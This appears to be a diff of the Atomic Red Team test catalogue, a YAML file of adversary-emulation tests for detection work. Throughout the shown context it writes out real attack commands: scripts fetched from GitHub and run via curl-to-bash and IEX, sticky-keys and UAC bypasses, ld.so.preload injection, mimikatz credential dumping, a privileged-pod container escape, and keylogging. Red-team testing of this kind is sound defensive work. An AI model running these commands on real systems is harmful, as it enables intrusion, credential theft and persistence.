@@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. -' + ' supported_platforms: - windows executor: @@ -7121,14 +7121,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 -' + ' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it -' + ' supported_platforms: - windows executor: 
@@ -7151,7 +7151,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt -' + ' supported_platforms: - windows input_arguments: @@ -7163,7 +7163,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -7174,7 +7174,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -7184,7 +7184,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore -' + ' name: powershell T1213.001: technique: @@ -7334,7 +7334,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -7350,10 +7350,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" @@ -7906,7 +7906,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 
@@ -8077,7 +8077,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -8096,14 +8096,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: @@ -8276,17 +8276,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} -' + ' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore -' + ' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script -' + ' supported_platforms: - linux - macos @@ -8299,7 +8299,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} -' + ' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -8321,10 +8321,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force -' + ' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore -' + ' name: powershell T1114.001: technique: 
@@ -8395,23 +8395,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" -' + ' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} -' + ' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore -' + ' name: powershell T1185: technique: @@ -8751,7 +8751,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) -' + ' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -8783,7 +8783,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -8794,16 +8794,16 @@ collection: executor: command: 'screencapture #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -8814,17 +8814,17 @@ collection: executor: command: 'screencapture -x #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud -' + ' supported_platforms: - linux input_arguments: 
@@ -8846,11 +8846,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -8858,14 +8858,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot -' + ' supported_platforms: - linux input_arguments: @@ -8876,28 +8876,28 @@ collection: dependencies: - description: 'ImageMagick must be installed -' + ' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat -' + ' executor: command: 'import -window root #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour -' + ' supported_platforms: - windows input_arguments: @@ -8919,7 +8919,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore -' + ' T1213.002: technique: external_references: @@ -9308,7 +9308,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -9316,7 +9316,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: 
@@ -9350,7 +9350,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -9361,7 +9361,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1547.014: @@ -9620,11 +9620,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -9633,11 +9633,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -9645,10 +9645,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: 
@@ -9756,31 +9756,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -9978,7 +9978,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: 
@@ -9994,30 +9994,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -10114,7 +10114,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -10424,7 +10424,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -10446,7 +10446,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -10468,7 +10468,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -10491,7 +10491,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f 
@@ -10514,7 +10514,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -10562,7 +10562,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -10575,11 +10575,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -10716,7 +10716,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -10761,7 +10761,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -10799,7 +10799,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -10916,10 +10916,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1078.004: @@ -11120,7 +11120,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -11131,17 +11131,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -11153,7 +11153,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -11164,20 +11164,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1134.002: 
@@ -11357,7 +11357,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -11377,7 +11377,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -11385,7 +11385,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -11417,7 +11417,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -11434,10 +11434,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -11612,10 +11612,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -11623,7 +11623,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: 
@@ -11735,16 +11735,16 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows executor: command: 'net user guest /active:yes -' + ' cleanup_command: 'net user guest /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -12185,21 +12185,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -12224,18 +12224,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -12335,10 +12335,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" 
@@ -12484,7 +12484,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -12582,24 +12582,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -12607,14 +12607,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -12625,11 +12625,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod -' + ' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db 
@@ -13173,7 +13173,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -13189,19 +13189,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -13337,7 +13337,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -13361,10 +13361,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -13373,7 +13373,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -13579,7 +13579,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: 
@@ -13596,15 +13596,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true @@ -13698,7 +13698,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -13715,15 +13715,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -13943,7 +13943,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -14141,7 +14141,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -14152,7 +14152,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1037.003: technique: 
@@ -14314,10 +14314,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -14358,7 +14358,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -14387,7 +14387,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -14417,7 +14417,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -14453,7 +14453,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -14863,7 +14863,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: 
@@ -14964,10 +14964,10 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" -' + ' name: command_prompt elevation_required: true T1055.002: @@ -15115,7 +15115,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -15131,13 +15131,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" @@ -15484,13 +15484,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -15502,7 +15502,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -15513,7 +15513,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
@@ -15636,7 +15636,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -15647,7 +15647,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -15682,7 +15682,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -15696,10 +15696,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -15710,7 +15710,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -15887,14 +15887,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: 
